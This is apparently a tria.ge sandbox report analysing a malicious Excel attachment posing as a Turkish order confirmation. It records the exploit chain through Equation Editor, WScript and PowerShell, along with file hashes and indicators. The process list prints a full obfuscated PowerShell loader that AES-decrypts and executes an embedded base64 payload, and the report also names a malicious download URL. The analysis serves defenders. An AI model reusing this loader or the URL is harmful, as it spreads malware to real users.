Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
144s -
max time network
108s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 10:29
Static task
static1
Behavioral task
behavioral1
Sample
Sipariş onayı.xls
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Sipariş onayı.xls
Resource
win10v2004-20240704-en
General
-
Target
Sipariş onayı.xls
-
Size
1.1MB
-
MD5
94d52f7b132f459b88ba2b9c6ed076cb
-
SHA1
6970a28538c35aa1c20b32a855e40c85842025d7
-
SHA256
57b1e7f094836b89c613e86a12966702169ead968058ac24c738b891bb8fa01e
-
SHA512
c8a18dab02481a7d226d9d3a71b38087e3406e089051995c1be66e49dcb5b715212ab3eb8a36fe7925a32cb79d6baa98ba0ed2cdb8ea5803d5c1e5fe80b8b594
-
SSDEEP
24576:48q+k+xbyN3g3yBO128OA2BFzfOSr4hBBzcIPuV8rv4zBkS3QHVO:dq+k+yOUJvSSr4N4IzvT+QH
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 17 288 EQNEDT32.EXE 20 2176 WScript.exe 22 2176 WScript.exe 24 2232 powershell.exe -
Abuses OpenXML format to download file from external location 2 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Office\Common\Offline\Files\http://woi.gg/poqZbi WINWORD.EXE Key opened \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Office\14.0\Common EXCEL.EXE -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
pid Process 2232 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 288 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1432 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2232 powershell.exe Token: SeShutdownPrivilege 2780 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1432 EXCEL.EXE 1432 EXCEL.EXE 1432 EXCEL.EXE 2780 WINWORD.EXE 2780 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 288 wrote to memory of 2176 288 EQNEDT32.EXE 33 PID 288 wrote to memory of 2176 288 EQNEDT32.EXE 33 PID 288 wrote to memory of 2176 288 EQNEDT32.EXE 33 PID 288 wrote to memory of 2176 288 EQNEDT32.EXE 33 PID 2780 wrote to memory of 2152 2780 WINWORD.EXE 34 PID 2780 wrote to memory of 2152 2780 WINWORD.EXE 34 PID 2780 wrote to memory of 2152 2780 WINWORD.EXE 34 PID 2780 wrote to memory of 2152 2780 WINWORD.EXE 34 PID 2176 wrote to memory of 2232 2176 WScript.exe 35 PID 2176 wrote to memory of 2232 2176 WScript.exe 35 PID 2176 wrote to memory of 2232 2176 WScript.exe 35 PID 2176 wrote to memory of 2232 2176 WScript.exe 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Sipariş onayı.xls"1⤵
- Abuses OpenXML format to download file from external location
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1432
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding1⤵
- Abuses OpenXML format to download file from external location
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2152
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:288 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rosepetelgoodfordress.vBS"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI30773578260699216772112657705967CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIQMf5B09cdBHkAi+7WX6Eim/0LQN2CVUEEynQsRZwEf+oX3ImFjPvUS61KgKvxRvbqbvV1BJjVdgJx56hZgwbiHtWmMltdNLbC+WPfe7eKX4Ft6t2mI6O58+EIo6eppVONGYZ4PiEan5OudS49/sjS50893i6Yhw5C3r48pNAHqUwb7IbeBoa9ry6Qdql8Of+qVQ3cJwZTrOp2UcyAou4IWVlmPqpX3XkMGABgkCfbyMN+Q6W06Kb2qhxKGZ90MI/5Lmo6aUU0pP3cgSwF9QFIo0TcHnGUkN9/Ibu7jDQF+k4GWMheDMEjsTiR25T7uIspS4GY79zjnTGg1D7yTPkE7fbEHYgqmJ14FKcPirsbSHMq4PnuKWeM1w6Os2/YujFcVFMl5JMJhfQ+WCpRTSv9UZ7ZOGhAynbAiDixJoNCrOpzMww6hrpICwpzKJykVqFrMdvgQ+RO/HsA1AZN/v+p9fQ6c6Kvx8xt7qgZmkDe1Jv4iTAlZOFrLQw1MWTYRr0Jj4qCe2CGH6mSTFuM4JfUHEQwLJj7aV7iniYAz070uEF+23PacsLacZN7GdSJGeuPFsxPmRFYw4SrRU/pgOAHdgkVvmsQRuELaz4j9qjzShIHysripsrsnboW4O34sIHJxxSK7BrcnsJ1GVRVAK+3neu/3JkQP3cfEtNUE/bUjkjGwKBZ6SRB3ffkI5dPi1OrATVfV22QLRqztCEoCIN4RQlmeESX1aZ9hhJ20dXXFh6OBPOVejKKEwLndSBIgx43T/RSJuYlpFYYV0nl8P2P0MF4L2UxNfUQ0y7uCAfH8mc1gOKrnVDsqlNBgxWXr/q12k/j7D5cxSl541IT/L6XsiRd3ohNAija/0XPRjiWymjPn9OENUmtc992I2iVIUZ8X93NM+ngBaZe5Nw/AhoaXr5U6DyvuoOvOtRPlYJbyZ7SB7NjxcSpoYbbmqBLRQVYMJilsPwG4Z1GK88B4LpQx/Kqt43EObh8tebhR2PZQsE5tJ/bgMgz6RjuM5alTeJseu4RdgYmQVn9TxzEfUxSANgHJU4vLl2oNtuIPkPtB+RUqwFo+ur+yATstDWzKzm3rl0a2uQyoT8GrMg9LaD+GWvqdFqiz3x9AWLSHqEQ0Qb1a/Ain8Eu3jLPXM6hZ1V7jBdBjJ6tz1CtW6Iz/RDtYcrLFqpIFMwDDJo+MZZoRwFOUPPGfPmHfLpq1XpjMC06L7Vc0vo7xY+oDLcsFDCYkwWCH469PdG2GLSWEXzwy8fvH74rIP8vyTnSRTgz7PU44zK7FRY7qVKW7n7GLCA0H6LbQ+39HckA9WL4uSsUME9GUPdjgLUsEV2jNpd0wTHtsOmB2iy1NE3ypGj5KZqsaSckxBgYX/yHiNgQcsG4mZ6eKpHQ3pA6iGchpeFlY/QveaoGWyqbHZmnQqxSPt0ns/vDUSi3wTAekaWWSJaeZtpxAj7+MK+PzGMr7A+ZRnYCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5b5cb610c294a6618c6043081054508f0
SHA15751c85ee092b7c30c93b1f1ea2baf890bd99d4a
SHA2568040a50a5ab1e6859d1ae14b1a9f84cf0fc328a0d9face70ec27ac8e6abe8cef
SHA512314a5c9e63275ab2d41b445f5b4cf1b9d17c06652c63ce44c0d7a25cc912a836bba7018e7d6efdbd7fb8350337f486cb56f463009cb52cf67fda28507bc2bf87
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5645287664cbf1bc468e7d792eeb91e44
SHA1a9f051d26930077fdc1593b3e9defb4018ab8314
SHA2565a58ced63147ff319d95e6fb03da5077b737bdc219a6697e15502cc4b908ee87
SHA5126d74329f303391aaf4a3535aec6b58478eb3fa636df2bbc5a5a15f52884d876414cc2ca63c550ffb9159a5118c5acf4795926d7bee5fbef5ef8af33e961a0d72
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e3301f0853adeb75c893792da959935b
SHA105587c0bbe8a4e388afcf097c65931b263a2fd44
SHA2562977d3fed2f10eb99576eef6172867663561f9e62516838ab8e3ae0d2d7cb144
SHA512dfc77656593462ed605c51953a9de4db81916025be517ec53c686c26d209e346a2b623ba1c1f0f1dbcf2852aff06979bb30e2bb3c215669a231b067f040a8e9b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD56beae66f4c7c60c38ba3cb7650e4f8ed
SHA1af297fae77232f11ebfc2103caa783170fa66750
SHA2561964474829f3b1dcf31249e0adb388f8f06f2468d2f825ab239616e336a6eb0d
SHA512449662dbe1b0ceaabdb7f4036849c2e1411e26e4c969de9d54ee1694038609ef423c853a7a7ec65f8791c40098a5eb58357e1be6d594025585a43d817a2e1a26
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{DA5DC326-69A9-4506-A8A0-5FC5539941CB}.FSD
Filesize128KB
MD554cff9032647ed7e4a770eaa8ed9dc0e
SHA1ba636fa3895b60ebaf57ed2dc5e0ee803115cfd0
SHA256c799b5487e951f3836547eaed081cface25c284fe01e7572d4332670b36415f3
SHA5120a94005aeeb8937f34d617c3ea4e358e6f4c0f9a60e493098877ea7cfe4071c403373ebe38c68d892a67853b829b50e3f2df21d7c3b3dab2fb0e6c27cf8d44a9
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize128KB
MD55b444cbdbc52eb352f3996d84239e829
SHA123a41f708656128d84d8215bf9f2a8b4835f6da3
SHA2561a10e1bdf84928d541d19dfadaf1d7a3132a96f5ec187cef8e3994f2d06d6800
SHA5121bdaab0c25075427c151cfa56815ee7167ec0e8111eac4a7d9d5a677ad80d4578fd187730f69da5580df2dc597129c1c3de887d98c0f8fb0e36ed53a30dc5d86
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{0E0C29EE-CC79-40E3-90D8-8449C14BFAA7}.FSD
Filesize128KB
MD5dac4f1cd0ecfe0f288818907d4e2f319
SHA186d37ff9226d6c173fc64b7f9148b876f42d8309
SHA256e948cd52bb462831e90bb0e7a0665e4bbc7b2498a7de071c51e746f8a67dd9a8
SHA5125f8bb95e6e8c006ea45f6f2f53b2186ef1f075e8951a9f38e92cec6a161fbe55de0de27d589d89873234a38bc0ec684a6a61e6104a56bf3275bb45f49dd18c55
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GLOK2QLQ\paste1[1].txt
Filesize156B
MD5ad6c37ef980373e9bcbd14810fad34bc
SHA19c061a1b3608b7c7f1db7cd06c8246913ee11bda
SHA256ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
SHA51230dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J8I3CVQY\we.we.we.we.wee[1].doc
Filesize221KB
MD5dec81947f9c288a6337b7eb4b8dec580
SHA1587afe240a9013b8a6fd0d2a574f2ce814fd40b3
SHA256008c8d4399750dba2733ce354ec97453535e8f00d293368a46c6e5514ebde20f
SHA512ca82e253009b29a6f2ad7143818c0a4209c56d3bb1aa01f70532a6a1c111399c3acf5b791cb4913fe94430013a0b7b377fb7f4ed65a60d14e60f7fa216006bbc
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
128KB
MD5fc7a9031da9cf43d5bfca3d9e1fe8004
SHA1ae1b787bff629f2d41bacf916da123ec7ad1cfea
SHA2563675add65bd995635aadc302dbafdf1894a981eda03c0b5ade57331c84d2930e
SHA5126df6b6742dc1eeda62e2dfcda71ab0de265790abf92ac48c39156999233e36d634fe4e51ec28690c6b19ed1c5f6608e416d97fc4863e3b4c18edfd405b5e81d8
-
Filesize
281B
MD5662f5093d14856818bc3e742feb4235d
SHA158d23d8ef269f770e03dafd08ba58d805f3f4c2d
SHA25692a056bff710e3ee5a7a836d42f470c5c289375cf8a577de83d7854d41c36fc2
SHA512358a1fd49519846f042d7715604410efa571813795fc73464fc88ea2bc81a18bc91d50890752f7fc11376cd0794f8a7e997288a50bd96ea0a5440c968178056b
-
Filesize
819B
MD59198d5f29a3e66eab0e4a70204f5b863
SHA16427b29a7e71153091fd4826b2e471903556fa6a
SHA256eee57b4b4543d5b6c0bdc0c8c2487f9db03664dde3c64743553ea09a0dc4c61d
SHA512074b619b8f981a5309adbb3de8cd460d80a49931469e491158de37985a2f9d0f70231e7614ae2bbd0d58c03e86d7a76864c31d29dba14a1a93446d49e390343e
-
Filesize
149KB
MD520765ae510b61f59e546c0b712a00009
SHA1feccf03d61bbb21c258f772014d75a5bec2b11ad
SHA25652caa19680e0ec9056836273759dc72e982c8ea03bd48a8c888a6b7acf193a35
SHA512805753a168b4c1942b8b10b3d06a82df0c308f65c9a5c04504bee9bd1da2d80bef87e2a6ead758ab90873918c944208b6af96583e6dffc1c5c591d57a4fa2cb0